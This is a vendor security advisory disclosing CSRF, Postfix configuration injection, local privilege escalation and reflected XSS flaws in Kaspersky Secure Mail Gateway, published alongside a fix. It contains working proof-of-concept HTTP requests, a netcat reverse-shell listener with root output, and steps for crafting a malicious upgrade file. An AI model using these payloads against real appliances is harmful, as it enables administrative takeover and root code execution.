Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

Kaspersky Secure Mail Gateway Multiple Vulnerabilities

1. *Advisory Information*

Title: Kaspersky Secure Mail Gateway Multiple Vulnerabilities
Advisory ID: CORE-2017-0010
Advisory URL:
http://www.coresecurity.com/advisories/kaspersky-secure-mail-gateway-multiple-vulnerabilities
Date published: 2018-02-01
Date of last update: 2018-02-01
Vendors contacted: Kaspersky Lab
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Cross-Site Request Forgery [CWE-352], Improper Neutralization of
Special Elements in Output Used by a Downstream Component [CWE-74], Improper
Privilege Management [CWE-269], Improper Neutralization of Input During Web
Page Generation [CWE-79]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-pending-assignment-1, CVE-pending-assignment-2,
CVE-pending-assignment-3, CVE-pending-assignment-4

3. *Vulnerability Description*

>From Kaspersky Labs website:

Kaspersky Secure Mail Gateway [1] gives you a fully integrated email
system; mail security solution - including anti-spam, anti-malware,
anti-phishing and more - in a single virtual appliance. It's easy to
install and manage - so you save time on day-to-day mail and mail
security tasks, while we deliver award-winning security that helps you
keep your business safe and boost user productivity.

Multiple vulnerabilities were found in the Kaspersky Mail Gateway Web
Management Console. It is possible for a remote attacker to abuse these
vulnerabilities and gain command execution as root.

4. *Vulnerable Packages*

Kaspersky Secure Mail Gateway 1.1.0.379
Other products and versions might be affected, but they were not tested.

5. *Vendor Information, Solutions and Workarounds*

Kaspersky Labs published the following advisory
   . https://support.kaspersky.com/vulnerability.aspx?el=12430#010218

6. *Credits*

These vulnerabilities were discovered and researched by Leandro Barragan
from Core Security Consulting Services. The publication of this advisory
was coordinated by Alberto Solino from Core Advisories Team.

7. *Technical Description / Proof of Concept Code*

Kaspersky Secure Mail Gateway is a virtual appliance designed to be
deployed inside the organization's network infrastructure. It comes
bundled with a Web Management Console to monitor the application status
and manage its operation.

This Management Console provides no cross-site request forgery
protection site-wide, which could result in administrative account
takeover as shown in 7.1.

In addition, an attacker who manages to get access to the Web Console
could gain command execution as root (7.2) by injecting arbitrary
content into the appliance's Postfix configuration.

It is also possible to elevate privileges from kluser to root (7.3) by
abusing a setuid binary shipped with the appliance, which executes a
script located on an attacker-controlled location with root privileges.

Apart from this, a reflected cross-site scripting vulnerability (7.4)
was found which affects the Management Console.

7.1. *Cross-site Request Forgery leading to Administrative account takeover*

[CVE-pending-assignment-1]
There are no Anti-CSRF tokens in any forms on the Web interface. This
would allow an attacker to submit authenticated requests when an
authenticated user browses an attacker-controlled domain.

The "Import Application Settings" feature is particularly interesting
because it allows users to restore a backup file that overwrites the
appliance's configuration.

A settings backup file contains five zlib segments:

/-----
$ binwalk KSMG_settings.kz

DECIMAL       HEXADECIMAL     DESCRIPTION
------------------------------------------------------------------------------
16            0x10            Zlib compressed data, default compression
39            0x27            Zlib compressed data, default compression
2242          0x8C2           Zlib compressed data, default compression
2268          0x8DC           Zlib compressed data, default compression
3072          0xC00           Zlib compressed data, default compression

-----/
The last segment is a compressed backup of /var/opt/kaspersky/klms/db
/passwd, which contains a list of usernames, passwords, and profiles,
for example:

/-----
# cat /var/opt/kaspersky/klms/db/passwd
Administrator:7{E{I'}Ap{RpY~t/V28\lZ&,FM&97s5`6f5e51bd7ade638785f5e7476351839e:admin
-----/

An attacker can craft a backup file that contains its own passwd file,
and then submit it by abusing the CSRF vulnerability.

The appliance then overwrites the original passwd file giving the
attacker access to Administrator account.

The following proof-of-concept request restores only account information
in order to avoid changing appliance's current configuration. Please
note that the file contents were removed to make it more readable.

/-----
POST /ksmg/cgi-bin/klwi?action=importSettings&callback=CC3262C5 HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0)
Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: multipart/form-data;
boundary=---------------------------3463969741915053213976213766
Content-Length: 3935
Referer: https://server/ksmg/
Cookie: SID=7362ED7771E7213F0EFCE85B430E240D
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------3463969741915053213976213766
Content-Disposition: form-data; name="data"

{"importSections":{"importWebPasswords":true,"importMachineIndependent":false,"importMachineDependent":false,"machineDependent":{"importTraces":false,"importProxy":false,"importAuth":false,"importBackup":false,"backupImportSection":{"importFileStorage":false},"importScan":false,"scanImportSection":{"importFilterSocket":false},"importUpdater":false,"importQuarantine":false},"importRules":false,"importPersonal":false}}
-----------------------------3463969741915053213976213766
Content-Disposition: form-data; name="fileContent";
filename="KSMG_settings.kz"
Content-Type: application/octet-stream

[...Tampered configuration file...]
-----------------------------3463969741915053213976213766--

-----/

7.2. *Configuration file injection leading to Code Execution as Root*

[CVE-pending-assignment-2]
Using the Web Management Console it is possible to add a "BCC Address
for all Messages". This configuration parameter is written verbatim to
the appliance's Postfix main.cf configuration file.

By adding LF characters to this parameter, it is possible to inject a
configuration parameter that would allow an attacker to execute
arbitrary commands on the appliance as root.

The following request injects arbitrary configuration settings into
/etc/postfix/main.cf:

/-----
POST /ksmg/cgi-bin/klwi?action=setMtaSettings HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0)
Gecko/20100101 Firefox/53.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://server/ksmg/
Content-Length: 1541
Cookie: SID=7362ED7771E7213F0EFCE85B430E240D
Connection: close

data={"alwaysBcc":"test@test.com\nmulti_instance_enable=yes\nmulti_instance_wrapper=\/tmp\/klms-appliance-upgrade\/upgrade.py\nmulti_instance_directories=\/tmp","mydomain":"localdomain",[...SNIPPED...]

-----/
            The resulting file looks as follows:
/-----
$ cat /etc/postfix/main.cf

...
always_bcc = test@test.com
multi_instance_enable=yes
multi_instance_wrapper=/tmp/klms-appliance-upgrade/upgrade.py
multi_instance_directories=/tmp
...

-----/
After that request is sent, postfix is automatically restarted, and the
file pointed by multi_instance_wrapper is executed. In this proof-
of-concept that parameter points to a python reverse shell:

/-----
$ nc -lvvvp 1080
Listening on [0.0.0.0] (family 0, port 1080)
Connection from [server] port 1080 [tcp/socks] accepted (family 2, sport
42776)
sh: no job control in this shell
sh-4.1# id
id
uid=0(root) gid=497(klusers) groups=497(klusers),90(postdrop)

-----/

Please note that while abusing this behavior would allow attackers to
execute any binary on the system, no arguments can be passed to it. In
order to overcome this we abused another Web Console functionality to
upload a Python script to the file system. That procedure is described
next.

An attacker can write to /tmp/klms-appliance-upgrade/ using the Web
Console using System Upgrade functionality. This feature takes an
upgrade file (i.e. a KTGZ file), decodes it, and unpacks it on
/tmp/klms-appliance-upgrade/.

KTGZ files can be crafted by creating a TAR.GZ file with a malicious
upgrade.py file inside it, and then XORing it with key 0xDF23B1ED. This
key is static and hardcoded on system's binaries.

When this file is uploaded using the Web Console, the upgrade process
will fail, as it lacks Kaspersky signature files. However, the content
of the rogue upgrade file (including the modified upgrade.py file used
on this proof-of-concept) will remain on /tmp/klms-appliance-upgrade/.
It is worth noting that file's permissions are conserved, so we can
upload files with the executable bit set.

7.3. *Local Privilege Escalation*

[CVE-pending-assignment-3]
There is a setuid root binary located on
/opt/kaspersky/klms-appliance/libexec/upgrade/:

/-----
$ ls -lha /opt/kaspersky/klms-appliance/libexec/upgrade/upgrade_launcher
-rws--x--- 1 root klusers 7,6K sep 24  2015
/opt/kaspersky/klms-appliance/libexec/upgrade/upgrade_launcher

-----/

This program looks for a python script once executed:

/-----
$ /opt/kaspersky/klms-appliance/libexec/upgrade/upgrade_launcher
/usr/bin/python: can't open file
'/tmp/klms-appliance-upgrade/upgrade.py': [Errno 2] No such file or
directory

-----/
/tmp/klms-appliance-upgrade/ directory is writeable by kluser by
default. If an attacker manages to run commands on the appliance as
kluser, s/he could abuse this behaviour to elevate privileges to root by
writing a malicious script on the aforementioned path and running
upgrade_launcher binary.

7.4. *Reflected Cross-Site Scripting*

[CVE-pending-assignment-4]
The callback parameter of the importSettings action method is vulnerable
to cross-site scripting.

/-----
https://server/ksmg/cgi-bin/klwi?action=importSettings&callback=CC3262C5</script><script>alert(1)</script><script>

-----/

8. *Report Timeline*
2017-09-26: Core Security sent an initial notification to Kaspersky,
including a draft advisory.
2017-09-27: Kaspersky answered saying there was nothing in attachment
and requested the possibility of sending draft advisory as a password
protected archive.
2017-09-29: Kaspersky asked again for the draft advisory.
2017-09-29: Core Security answered saying password protected archive is
not possible and sent the advisory in text form (inside the mail).
2017-10-04: Kaspersky acknowledged the reception of the advisory and
confirmed the vulnerabilities in the product. They said issues will be
fixed 'till the end of November'.
2017-11-13: Kaspersky informed they had to postpone the release of the
patch and won't make it to the end of November as originally proposed.
They are asking to postpone the release to February 1st, 2018.
2017-11-13: Core Security answered acknowledging February 1st 2018 as
the target publication date of the advisory and fix for the reported
issues.
2018-01-16: Core Security asked final confirmation for February 1st as
the target publication date and also the CVE-IDs for each one of the
vulnerabilities found.
2018-01-18: Kaspersky confirmed February 1st as publication date.
2018-01-26: Core Security informed our advisory will be published
February 1st at 12pm EST.
2018-01-30: Kaspersky informed they are waiting CVE-IDs from MITRE and
that process might take a week long. Proposed postponing publication to
February 8th.
2018-01-30: Core Security stated that postponing publication would not
be possible and that the advisory will be published with pending CVE-IDs
for each one of the vulnerabilities found until Kaspersky provides the
final IDs. Also asked for a link to the fix to be included in the final
advisory.
2018-01-30: Kaspersky sent the link for downloading latest KSMG version.
2018-01-30: Core Security acknowledged the information received.
2018-02-01: Advisory CORE-2017-0010 published.

9. *References*

[1]
https://www.kaspersky.com/small-to-medium-business-security/mail-security-appliance

10. *About CoreLabs*

CoreLabs, the research center of Core Security, is charged with
anticipating the future needs and requirements for information security
technologies.
We conduct our research in several important areas of computer security
including system vulnerabilities, cyber attack planning and simulation,
source code auditing, and cryptography. Our results include problem
formalization, identification of vulnerabilities, novel solutions and
prototypes for new technologies. CoreLabs regularly publishes security
advisories, technical papers, project information and shared software
tools for public use at: http://corelabs.coresecurity.com.

11. *About Core Security*

Core Security provides companies with the security insight
they need to know who, how, and what is vulnerable in their
organization. The company's threat-aware, identity & access,
network security, and vulnerability management solutions
provide actionable insight and context needed to manage
security risks across the enterprise. This shared insight
gives customers a comprehensive view of their security posture
to make better security remediation decisions. Better insight
allows organizations to prioritize their efforts to protect
critical assets, take action sooner to mitigate access risk,
and react faster if a breach does occur.

Core Security is headquartered in the USA with offices and
operations in South America, Europe, Middle East and Asia. To
learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com

12. *Disclaimer*

The contents of this advisory are copyright (c)2018 Core Security and
(c)2018 CoreLabs, and are licensed under a Creative Commons Attribution
Non-Commercial Share-Alike 3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/